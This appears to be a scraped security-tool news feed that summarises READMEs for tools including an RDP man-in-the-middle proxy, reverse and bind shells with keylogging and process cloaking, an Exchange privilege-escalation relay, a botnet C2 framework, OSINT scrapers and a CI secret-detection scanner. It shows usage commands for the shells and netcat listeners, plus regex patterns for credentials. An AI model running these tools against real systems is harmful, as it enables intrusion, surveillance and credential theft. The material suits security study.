This will block the client's input / output for 5 seconds to hide the console and prevent interference. After 5 seconds, input / output is restored back to normal.

Other MITM arguments
Run pyrdp-mitm.py --help for a full list of arguments.

Using the PyRDP Player
Use pyrdp-player.py to run the player.

Playing a replay file
You can use the menu to open a new replay file: File > Open.
You can also open replay files when launching the player:
pyrdp-player.py <FILE1> <FILE2> ...

Listening for live connections
The player always listens for live connections. By default, the listening port is 3000, but it can be changed:
pyrdp-player.py -p <PORT>

Changing the listening address
By default, the player only listens to connections coming from the local machine. We do not recommend opening up the player to other machines. If you still want to change the listening address, you can do it with -b:
pyrdp-player.py -b <ADDRESS>

Other player arguments
Run pyrdp-player.py --help for a full list of arguments.

Using the PyRDP Certificate Cloner
The PyRDP certificate cloner creates a brand new X509 certificate by using the values from an existing RDP server's certificate. It connects to an RDP server, downloads its certificate, generates a new private key and replaces the public key and signature of the certificate using the new private key. This can be used in a pentest if, for example, you're trying to trick a legitimate user into going through your MITM. Using a certificate that looks like a legitimate certificate could increase your success rate.

Cloning a certificate
You can clone a certificate by using pyrdp-clonecert.py:
pyrdp-clonecert.py 192.168.1.10 cert.pem -o key.pem
The -o parameter defines the path name to use for the generated private key.

Using a custom private key
If you want to use your own private key instead of generating a new one:
pyrdp-clonecert.py 192.168.1.10 cert.pem -i input_key.pem

Other cloner arguments
Run pyrdp-clonecert.py --help for a full list of arguments.

Using PyRDP as a Library
If you're interested in experimenting with RDP and making your own tools, head over to our documentation section for more information.

Using PyRDP with Bettercap
We developped our own Bettercap module, rdp.proxy, to man-in-the-middle all RDP connections on a given LAN. Check out this document for more information.

PyRDP Presentations

Contributing to PyRDP
See our contribution guidelines.

Acknowledgements
PyRDP uses code from the following open-source software:
  • RC4-Python for the RC4 implementation.
  • rdesktop for bitmap decompression.
  • rdpy for RC4 keys, the bitmap decompression bindings and the base GUI code for the PyRDP player.
  • FreeRDP for the scan code enumeration.


Anteater - CI/CD Gate Check Framework

$
0
0

Anteater is an open framework to prevent the unwanted merging of nominated strings, filenames, binaries, depreciated functions, staging enviroment code / credentials etc. Anything that can be specified with regular expression syntax, can be sniffed out by anteater.
You tell anteater exactly what you don't want to get merged, and anteater looks after the rest.
If anteater finds something, it exits with a non-zero code which in turn fails the build of your CI tool, with the idea that it would prevent a pull request merging. Any false positives are easily negated by using the same RegExp framework to cancel out the false match.
Entire projects may also be scanned also, using a recursive directory walk.
With a few simple steps it can be easily implemented into a CI / CD workflow with tooling such as Travis CI, CircleCI, Gitlab CI/CD and Jenkins.
It is currently used in the Linux Foundations project 'OPNFV' as means to provide automated security checks at gate, but as shown in the examples below, it can be used for other scenarios.
Anteater also provides integrates with the Virus Total API, so any binaries, public IP addresses or URL's found by anteater, will be sent to the Virus Total API and a report will be returned. If any object is reported as malicous, it will fail the CI build job.
Example content is provided for those unsure of what to start with and its encouraged and welcomed to share any Anteater filter strings you find useful.

Why would I want to use this?
Anteater has many uses, and can easily be bent to cover your own specific needs.
First, as mentioned, it can be set up to block strings and files with a potential security impact or risk. This could include private keys, a shell history, aws credentials etc.
It is especially useful at ensuring that elements used in a staging / development enviroment don't find there way into a production enviroment.
Let's take a look at some examples:
apprun:
regex: app\.run\s*\(.*debug.*=.*True.*\)
desc: "Running flask in debug mode could potentially leak sensitive data"
The above will match code where a flask server is set to running in debug mode app.run(host='0.0.0.0' port=80 debug=true), which can be typical to a developers enviroment and mistakenly staged into production.
For a rails app, this could be:
regex: \<%=.*debug.*%>
Even more simple, look for the following in most logging frameworks:
regex: log\.debug
Need to stop developers mistakenly adding a private key?
  private_key:
regex: -----BEGIN\sRSA\sPRIVATE\sKEY----
desc: "This looks like it could be a private key"
How about credential files that would cause a job loss if ever leaked into production? Anteater works with file names too.
For Example:
jenkins\.plugins\.publish_over_ssh\.BapSshPublisherPlugin\.xml
Or even..
- \.pypirc
- \.gem\/credentials
- aws_access_key_id
- aws_secret_access_key
- LocalSettings\.php
If your app has its own custom secrets / config file, then its very easy to add your own regular expressions. Everything is set using YAML formatting, so no need to change anteaters code.

Depreciated functions, classes etc
Another use is for when a project depreciates an old function, yet developers might still make pull requests using the old function naming:
depreciated_function:``
regex: depreciated_function\(.*\)
desc: This function was depreciated in release X, use Y function.
Or perhaps stopping people from using 1.x versions of a framework:
<script.src.*="https:\/\/ajax\.googleapis\.com\/ajax\/libs\/angularjs\/1.*<\/script>

What if I get false postives?
Easy, you set a RegExp to stop the match , kind of like RegExp'ception.
Let's say we want to stop use of MD5:
md245:
regex: md[245]
desc: "Insecure hashing algorithm"
This then incorrectly gets matched to the following:
mystring = int(amd500) * 4
We set a specific ignore RegEx, so it matches and then is unmatched by the ignore entry.
mystring.=.int\(amd500\).*
Yet other instance of MD5 continue to get flagged.

Binaries
With anteater, if you pass the argument --binaries, any binary found causes a build failure on the originating pull request. It is not until a sha256 checksum is set within anteater's YAML ignore files, that the build is allowed to pass.
This means you can block people from checking in compiled objects, images, PDFs etc that may have an unknown origin or tampering with the existing binary files.
An example:
$ anteater --binaries --project myproj --patchset /tmp/patch
Non Whitelisted Binary file: /folder/to/repo/images/pal.png
Please submit patch with this hash: 3aeae9c71e82942e2f34341e9185b14b7cca9142d53f8724bb8e9531a73de8b2
Let's enter the hash::
binaries:
images/pal.png:
- 3aeae9c71e82942e2f34341e9185b14b7cca9142d53f8724bb8e9531a73de8b2
Run the job again::
$ anteater --binaries --project myproj --patchset /tmp/patch
Found matching file hash for: /folder/to/repo/images/pal.png
This way we can sure binaries are not tampered with by means of a failed cryptographic signature / checksum.
Any binaries not having a sha256 checksum will also be sent to the Virus Total API for scanning.

Virus Total API
If the following flags (combined or individually) --ips, -urls, --binaries are used, anteater will perform a lookup to the Virus Total API.
IP addresses, will be have their DNS history checked for any previous or present connection with known black listed domains marked as malicious or containing malware.
URLs, will be checked for any previous or present connection with known black listed domains marked as malicious or containing malware.
As mentioned, Binaries will be sent to Virus Total and verified as clean / infected.
For more details and indepth documentation, please visit readthedocs
Last of all, if you do use anteater, I would love to know (twitter: @lukeahinds) and pull requests / issues are welcome!

Contribute
Contributions are welcome.
Please make a pull request in a new branch, and not master.
git checkout -b mypatch
git push origin mypatch
Unit tests and PEP8 checks are in tox, so simply run the tox command before pushing your code.
If your patch fixes and issue, please paste the issue url into the commit message.


Shodan-Eye - Tool That Collects All The Information About All Devices Directly Connected To The Internet Using The Specified Keywords That You Enter

$
0
0


This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview.
The types of devices that are indexed can vary enormously: from small desktops, refrigerators to nuclear power plants and everything in between. You can find everything using "your own" specified keywords. Examples can be found in a file that is attached:
The information obtained with this tool can be applied in many areas, a small example:
  • Network security, keep an eye on all devices in your company or at home that are confronted with internet.
  • Vulnerabilities. And so much more.

Shodan
Is a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client.
What is the difference between Google or another search engine: The most fundamental difference is that Shodan Eye crawls on the internet, Google on the World Wide Web. However, the devices that support the World Wide Web are only a small part of what is actually connected to the Internet.

Shodan
For additional data gathering, you can enter a Shodan API key when prompted. A Shodan API key can be found here: https://account.shodan.io/register

A collection of search queries for Shodan is attached:
Shodan Dorks ... The Internet of Sh*t

I also want to make you aware that:
  • This was written for educational purpose and pentest only.
  • The author will not be responsible for any damage ..!
  • The author of this tool is not responsible for any misuse of the information.
  • You will not misuse the information to gain unauthorized access.
  • This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
  • Performing any hacks without written permission is illegal ..!



Video Shodan Eye on YouTube:
Link to: Shodan Eye on YouTube

Python:
I made this script in python 2.7 (Later I can - I will change this to python 3) But for now I think python 2 is nicer, more beautiful and better. "It's kind of personal"

Install Shodan Eye on Linux:
git clone https://github.com/BullsEye0/shodan-eye.git
cd shodan-eye
pip install -r requirements.txt

Use:
python shodan-eye
(You will be asked for a Shodan API key)
Have fun ..!

Contact to coder
Facebook: https://www.facebook.com/jolandadekoff
linkedin: https://www.linkedin.com/in/jolandadekoff
Youtube: https://youtu.be/XCtWM-4ov2U
Facebook Page: https://www.facebook.com/ethical.hack.group
Facebook Group: https://www.facebook.com/groups/ethicalhacking.hacker


DetExploit - Software That Detect Vulnerable Applications, Not-Installed OS Updates And Notify To User

$
0
0

DetExploit is software that detect vulnerable applications and not-installed important OS updates on the system, and notify them to user.
As we know, most of cyberattacks uses vulnerability that is released out year before.
I thought this is huge problem, and this kind of technology should be more powerful than technology that will detect unknown malwares or exploits.
Also this project is my theme of Mitou Jr project in Japan.
I wish and work hard to make this an huge OSS (Open Source Software) project, to help these days society.

Demo
  • Demo Video Clip (v0.5, English, Click and jump to YouTube to play video)

Requirements

How to run
Executable Build is not available now.
It is planned to be availble on stable release.
# Install requirements
C:\path\to\DetExlopit>pip install -r requirements.txt
# Move to src directory
C:\path\to\DetExlopit>cd src
# Run CUI version using python (PATH needs to be configured if not.)
C:\path\to\DetExlopit\src>python main.py
# Run GUI version using python (PATH needs to be configured if not.)
C:\path\to\DetExploit\src>python gui.py

Supported Database

Contact to developer


Stegify - Go Tool For LSB Steganography, Capable Of Hiding Any File Within An Image

$
0
0
stegify is a simple command line tool capable of fully transparent hiding any file within an image. This technique is known as LSB (Least Significant Bit) steganography.

Demonstration

Carrier

Data

Results

The Result file contains the Data file hidden in it. And as you can see it is fully transparent.

Install
$ go get -u github.com/DimitarPetrov/stegify

Usage

As a command line tool
$ stegify -op encode -carrier <file-name> -data <file-name> -result <file-name>
$ stegify -op decode -carrier <file-name> -result <file-name>
When encoding, the file with name given to flag -data is hidden inside the file with name given to flag -carrier and the resulting file is saved in new file in the current working directory under the name given to flag -result. The file extension of result file is inherited from the carrier file and must not be specified explicitly in the -result flag.
When decoding, given a file name of a carrier file with previously encoded data in it, the data is extracted and saved in new file in the current working directory under the name given to flag -result. The result file won't have any file extension and therefore it should be specified explicitly in -result flag.
In both cases the flag -result could be omitted and it will be used the default file name: result

Programmatically in your code
stegify can be used programmatically too and it provides easy to use functions working with file names or raw Readers and Writers. You can visit godoc under steg package for details.

Disclaimer
If carrier file is in jpeg or jpg format, after encoding the result file image will be png encoded (therefore it may be bigger in size) despite of file extension inherited from the original carrier file (which is .jpeg or .jpg).


TinkererShell - A Simple Python Reverse Shell Written Just For Fun

$
0
0
A simple reverse shell written in python 3.7 just for fun. Actually it supports Windows and Linux OS and integrates some basic features like keylogging and AES encrypted communications.

Supported operating systems:
  • Windows
  • Linux
  • OSX

Functions and characteristics:
  • Reverse connection.
  • AES encrypted communications.
  • Multithreaded.
  • Support multiple bots connected at the same time.
  • Keylogger.
  • Possibility to take screenshots of bot's monitors.
  • Possibility to take pictures using bot's webcam.
  • Possibility to steal bot's clipboard's content.
  • Possibility to enable or disable persistence (before payload delivery or later via remote control).
  • Possibility to enable or disable keylogger (before payload delivery or later via remote control).
  • Simple DNS spoofer (via hosts file).
  • Capability to upload and download files to and from the bot.
Work in progress... stay tuned!

TODO:
  • Thoroughly test persistence function on Linux.
  • Thoroughly test persistence function on Windows.
  • Add webcam stream and microphone recording (ideally streaming from bot and saving locally to master).
This project is for educational purposes only. Don't use it for illegal activities. I don't support nor condone illegal or unethical actions and I can't be held responsible for possible misuse of this software.


PostShell - Post Exploitation Bind/Backconnect Shell

$
0
0

PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control. The stub size is around 14kb and can be compiled on any Unix like system.

Why not use a traditional Backconnect/Bind Shell?
PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl. It also incorporates both a back connect and bind shell, meaning that if a target doesn't allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely. PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.

Features
  • Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.
  • Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.
  • TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.
  • Bind/Backconnect shell, both a bind shell and back connect can be created.
  • Small Stub Size, a very small stub(<14kb) is usually generated.
  • Automatically Daemonizes
  • Tries to set GUID/UID to 0 (root)

Getting Started
  1. Downloading: git clone https://github.com/rek7/postshell
  2. Compiling: cd postshell && sh compile.sh This should create a binary called "stub" this is the malware.

Commands
$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Example Usage
Backconnect:
$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377

Recieving a Connection with Netcat
Recieving a backconnect:
$ nc -vlp port
Connecting to a bind Shell:
$ nc host port

TODO:
  • Add domain resolution



PrivExchange - Exchange Your Privileges For Domain Admin Privs By Abusing Exchange

$
0
0

POC tools accompanying the blog Abusing Exchange: One API call away from Domain Admin.

Requirements
These tools require impacket. You can install it from pip with pip install impacket, but it is recommended to use the latest version from GitHub.

privexchange.py
This tool simply logs in on Exchange Web Services to subscribe to push notifications. This will make Exchange connect back to you and authenticate as system.

httpattack.py
Attack module that can be used with ntlmrelayx.py to perform the attack without credentials. To get it working:
  • Modify the attacker URL in httpattack.py to point to the attacker's server where ntlmrelayx will run
  • Clone impacket from GitHub git clone https://github.com/SecureAuthCorp/impacket
  • Copy this file into the /impacket/impacket/examples/ntlmrelayx/attacks/ directory.
  • cd impacket
  • Install the modified version of impacket with pip install . --upgrade or pip install -e .


ACT Platform - Open Platform For Collection And Exchange Of Threat Intelligence Information

$
0
0

Semi-Automated Cyber Threat Intelligence (ACT) is a research project led by mnemonic as with contributions from the University of Oslo, NTNU, Norwegian Security Authority (NSM), KraftCERT and Nordic Financial CERT.
The main objective of the ACT project is to develop a platform for cyber threat intelligence to uncover cyber attacks, cyber espionage and sabotage. The project will result in new methods for data enrichment and data analysis to enable identification of threat agents, their motives, resources and attack methodologies. In addition, the project will develop new methods, work processes and mechanisms for creating and distributing threat intelligence and countermeasures to stop ongoing and prevent future attacks.
In this repository the code of the ACT platform is published under an Open Source license.

Usage
The ACT platform exposes a set of REST APIs. See this guideline on how to work with the API.

Installation

Prerequisites
  • Java 8 for running the application.
  • Maven for managing dependencies, building the code, running the unit tests, etc.
  • An installation of Apache Cassandra for storage. Any version of Apache Cassandra 3.x is support.
    • Import the Cassandra database schema from deployment-service/resources/cassandra.cql.
  • An installation of Elasticsearch for indexing. Version 6.8 of Elasticsearch is required.
  • (Optional) An installation of ActiveMQ for the multi-node environment.
  • (Optional) An installation of Docker for running the integration tests.

Compilation
  • Execute mvn clean install -DskipTests from the repository's root folder to compile the code.
  • Afterwards follow the deployment guide to run the application.

Testing
  • Download a Cassandra image by docker pull cassandra.
  • Download an Elasticsearch image by docker pull docker.elastic.co/elasticsearch/elasticsearch:6.8.2.
  • Download an ActiveMQ image by docker pull webcenter/activemq.
  • Execute mvn clean install for running all tests including integration tests.
  • Execute mvn clean install -DskipSlowTests for skipping the integration tests.
  • By default the integration tests will try to connect to Docker on localhost and port 2375. Set the $DOCKER_HOST environment variable to override this behaviour.


Stardox - Github Stargazers Information Gathering Tool

$
0
0

Stardox is an advanced github stargazersinformation gathering tool. It scraps Github for information and display them in list tree view.It can be used for collecting information of your's/someones repository stargazers details.

What data it fetchs :
  1. Total repsitories
  2. Total stars
  3. Total Followers
  4. Total Following
  5. Stargazer's Email
P.S: Many new things will be added soon.

Gallery


Fetching data of repository.



List tree view of fetched data.



Getting Started

Steps to setup :
  1. git clone https://github.com/0xprateek/stardox
  2. cd stardox
  3. pip install -r requirements.txt

Starting Stardox :
  1. cd stardox/src
  2. a) Using Command line arguments
    python3 stardox.py https://github.com/Username/repository-URL
    b) Without Command line arguments
    python3 stardox.py

Usage :
 stardox.py [-h] [-v] repositoryURL

positional arguments:
 repositoryURL  Path to repository.

optional arguments:
 -h, --help     show this help message and exit
-v, --verbose Verbose


Project iKy v2.2.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface

$
0
0

Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Video


Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend


Redis
You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install
And turn on the server in a terminal
redis-server

Python stuff and Celery
You must install the libraries inside requirements.txt
pip install -r requirements.txt
And turn on Celery in another terminal, within the directory backend
./celery.sh
Finally, again, in another terminal turn on backend app from directory backend
python app.py

Install Frontend


Node
First of all, install nodejs.

Dependencies
Inside the directory frontend install the dependencies
npm install

Turn on Frontend Server
Finally, to run frontend server, execute:
npm start

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.

  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded

Disclaimer

Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the "other" use).
Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.
Consider that all the information collected is free and available online, the tool only tries to discover, collect and display it.
Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother.
If even with the APIs it doesn't show "nice" things that you expect to see, try other e-mails before you remember my mother.
If you still do not see the "nice" things you expect to see, you can create an issue, contact us by e-mail or by any of the RRSS, but keep in mind that my mother is neither the creator nor Contribute to the project.
We do not refund your money if you are not satisfied.
I hope you enjoy using the tool as much as we enjoy doing it. The effort was and is enormous (Time, knowledge, coding, tests, reviews, etc.) but we would do it again.
Do not use the tool if you cannot read the instructions and / or this disclaimer clearly.
By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.


Aura-Botnet - A Super Portable Botnet Framework With A Django-based C2 Server

$
0
0

Aura Botnet

C2 Server
The botnet's C2 server utilizes the Django framework as the backend. It is far from the most efficient web server, but this is offset by the following:
  • Django is extremely portable and therefore good for testing/educational purposes. The server and database are contained within the aura-server folder.
  • Django includes a very intuitive and powerful admin site that can be used for managing bots and commands
  • The server is only handling simple POST requests and returning text
  • Static files should be handled by a separate web server (local or remote) that excels in serving static files, such as nginx
The admin site located at http://your_server:server_port/admin can be accessed after setting up a superuser (see below).

Database
The C2 server is currently configured to use a SQLite3 database, bots.sqlite3. The current configuration can be changed in aura-server/aura/settings.py. You may wish to use MySQL, or even PostgreSQL instead; this easy to do thanks to Django's portable database API.

Bot Clients
The primary client is written in C++, and can be compiled for either Linux or Windows using CMake. Alternate clients are written in Rust, Bash, and Powershell, but are may lack certain functionality as they are mostly unsupported. I will fix any major bugs that come to my attention, but they will continue to lack certain features for the time being, such as running commands in different shells.
The client will gather relevant system information and send it to the C2 server to register the new bot. Identification is done by initially creating a file containing random data -- referred to as the auth file throughout the code -- which will then be hashed each time the client runs to identify the client and authenticate with the C2 server. It will then install all the files in the folder specified in the code, and initialize the system service or schedule a task with the same privileges that the client was run with. The default settings have the client and other files masquerading as configuration files.

Getting Started: C2 Server
Read documentation here

Geting Started: Bot Clients
Read documentation here

Other Notes
Because this is for testing purposes, the C2 server needs to be hard-coded into client and web delivery files. It is currently set to localhost on all the files. This is because an actual botnet would use something like a domain generation algorithm (DGA) to sync a stream of changing domains on the client side with a stream of disposable domains being registered -- or just really bulletproof hosting like the original Mirai botnet.
The code is also not obfuscated nor is there any effort put toward preventing reverse engineering; this would defeat the purpose of being a botnet for testing and demonstrations.
The killswitch folder contains scripts for easy client removal when testing on your devices.

This tool is for testing/demonstration purposes only. This is not meant to be implemented in any real world applications except for testing on authorized machines.


Viewing all 5854 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>